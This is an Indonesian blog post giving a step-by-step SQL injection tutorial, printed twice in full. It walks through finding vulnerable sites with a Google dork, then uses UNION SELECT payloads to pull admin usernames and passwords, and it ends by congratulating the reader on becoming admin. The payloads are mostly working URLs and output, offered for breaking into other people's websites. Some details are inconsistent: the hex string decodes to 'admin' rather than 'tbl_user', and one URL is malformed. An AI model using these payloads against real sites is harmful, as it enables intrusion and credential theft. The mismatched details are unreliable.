SQL injection adalah suatu istilah trik sederhana yang paling sering di gunakan oleh para h**ker untuk mengambil username & password sebuah website. Dan ini adalah sedikit tutorial dari saya untuk anda :)
tanpa banyak intermezzo let's go ke TKP :
yang perlu di siapkan sebelum menginjeksi :
- Firefox
- plugin hackbar di mozzila (ini untuk mengkonversikan String menjadi Hexa)
- target website
1.pertama kita cari target yang ingin di injek dengan cara googleDork:
- googleDork : inurl: "product.php?id="
(disini target saya : www.sasaran.com/index.php?id=130 )
2.Setelah itu, kita cari kelemahan webiste nya dengan cara memberikan tanda petik satu/quote ' di ujung URL,
- www.sasaran.com/index.php?id=130'
jika ada kelemahan maka akan muncul tulisan seperti ini :
_query error: Resource id #3You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by id' at line 1
3. kemudian kita cari jumlah kolom :
- www.sasaran.com/index.php?id=-130+order+by+1--
(cari dimana pesan errornya,jika pesan error nya tidak muncul, cari lagi hingga muncul pesan error)
- www.sasaran.com/index.php?id=-130+order+by+1--
- www.sasaran.com/index.php?id=-130+order+by+2--
- www.sasaran.com/index.php?id=-130+order+by+3--
- www.sasaran.com/index.php?id=-130+order+by+4--
- www.sasaran.com/index.php?id=-130+order+by+5--
Unknown column ’5′ in ‘order clause’ <------------ nih pesan errornya
(naahhh muncul pesan errornya)
4. jika errornya muncul pada angka 5, jadi jumlah kolomnya 5-1= 4 :D ...
5. cek lagi kolom yang bisa di injek :
- www.sasaran.com/index.php?id=-130+union+select+1,2,3,4--
misalnya muncul angka, 1, 3 (nggak harus 1 & 3 yang muncul).
6. pilih salah satu angkanya disini saya pilih angka 3. kemudian cek mysql yang di pakai website tersebut :
- www.sasaran.com/index.php?id=-130+union+select+1,2,version(),4--
(ganti angka yang kita pilih dengan "version()" )
- nih pesannya : "5.0.95-community"
7. bearti wesite tersebut menggunakan mysql versi 5, mysql versi 5 lebih mudah kita injek, untuk versi 4 mungkin lebih susah :)
8. kita cek lagi, (bosan ya nge-Cek terus).. hehhe, cek jumlah tabel dari databasenya dengan menambah kan "group_concat(table_name)" di angka yang kita pilih tadi :
- www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4--
- jangan lupa tambahkan juga "from+information_schema.tables+where+table_schema=database()--" jadi di URL nya seperti ini :
- www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4 +from+information_schema.tables+where+table_schema=database()--
9. jreeeeeenngggggggggg, muncul nama tabelnya : "
"tbl_user,tbl_barang,tbl_penjual"
10. lihat tabel mana yang menarik untuk anda lihat : (pastinya tabel tbl_user)
sebelum kita ke step selanjutnya, kita convert dulu "tbl_user" ke hexadecimal, untuk cara mengkonvertnya cari di google :)
- www.sasaran.com/index?php=-130+union+select+group_concat(column_name,0x3a)from+information_schema.columns+where+table_name=0x61646d696e--
naaahhh, muncul deh kolom-kolom dari tabel "tbl_user" :
misalnya ada muncul kolom USERNAME & PASSWORD
11. Ayo kita bongkar lagi kolom username & password nya :)
- www.sasaran.com/index.php?id=-130+union+select+group_concat(username,0x3a,password)from+admin--
12. jeeeeng jeeeeeeeeenggg.... muncul deh username & passwordnya selamat menjadi ADMIN :)
tanpa banyak intermezzo let's go ke TKP :
yang perlu di siapkan sebelum menginjeksi :
- Firefox
- plugin hackbar di mozzila (ini untuk mengkonversikan String menjadi Hexa)
- target website
1.pertama kita cari target yang ingin di injek dengan cara googleDork:
- googleDork : inurl: "product.php?id="
(disini target saya : www.sasaran.com/index.php?id=130 )
2.Setelah itu, kita cari kelemahan webiste nya dengan cara memberikan tanda petik satu/quote ' di ujung URL,
- www.sasaran.com/index.php?id=130'
jika ada kelemahan maka akan muncul tulisan seperti ini :
_query error: Resource id #3You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by id' at line 1
3. kemudian kita cari jumlah kolom :
- www.sasaran.com/index.php?id=-130+order+by+1--
(cari dimana pesan errornya,jika pesan error nya tidak muncul, cari lagi hingga muncul pesan error)
- www.sasaran.com/index.php?id=-130+order+by+1--
- www.sasaran.com/index.php?id=-130+order+by+2--
- www.sasaran.com/index.php?id=-130+order+by+3--
- www.sasaran.com/index.php?id=-130+order+by+4--
- www.sasaran.com/index.php?id=-130+order+by+5--
Unknown column ’5′ in ‘order clause’ <------------ nih pesan errornya
(naahhh muncul pesan errornya)
4. jika errornya muncul pada angka 5, jadi jumlah kolomnya 5-1= 4 :D ...
5. cek lagi kolom yang bisa di injek :
- www.sasaran.com/index.php?id=-130+union+select+1,2,3,4--
misalnya muncul angka, 1, 3 (nggak harus 1 & 3 yang muncul).
6. pilih salah satu angkanya disini saya pilih angka 3. kemudian cek mysql yang di pakai website tersebut :
- www.sasaran.com/index.php?id=-130+union+select+1,2,version(),4--
(ganti angka yang kita pilih dengan "version()" )
- nih pesannya : "5.0.95-community"
7. bearti wesite tersebut menggunakan mysql versi 5, mysql versi 5 lebih mudah kita injek, untuk versi 4 mungkin lebih susah :)
8. kita cek lagi, (bosan ya nge-Cek terus).. hehhe, cek jumlah tabel dari databasenya dengan menambah kan "group_concat(table_name)" di angka yang kita pilih tadi :
- www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4--
- jangan lupa tambahkan juga "from+information_schema.tables+where+table_schema=database()--" jadi di URL nya seperti ini :
- www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4 +from+information_schema.tables+where+table_schema=database()--
9. jreeeeeenngggggggggg, muncul nama tabelnya : "
"tbl_user,tbl_barang,tbl_penjual"
10. lihat tabel mana yang menarik untuk anda lihat : (pastinya tabel tbl_user)
sebelum kita ke step selanjutnya, kita convert dulu "tbl_user" ke hexadecimal, untuk cara mengkonvertnya cari di google :)
- www.sasaran.com/index?php=-130+union+select+group_concat(column_name,0x3a)from+information_schema.columns+where+table_name=0x61646d696e--
naaahhh, muncul deh kolom-kolom dari tabel "tbl_user" :
misalnya ada muncul kolom USERNAME & PASSWORD
11. Ayo kita bongkar lagi kolom username & password nya :)
- www.sasaran.com/index.php?id=-130+union+select+group_concat(username,0x3a,password)from+admin--
12. jeeeeng jeeeeeeeeenggg.... muncul deh username & passwordnya selamat menjadi ADMIN :)
Tidak ada komentar:
Posting Komentar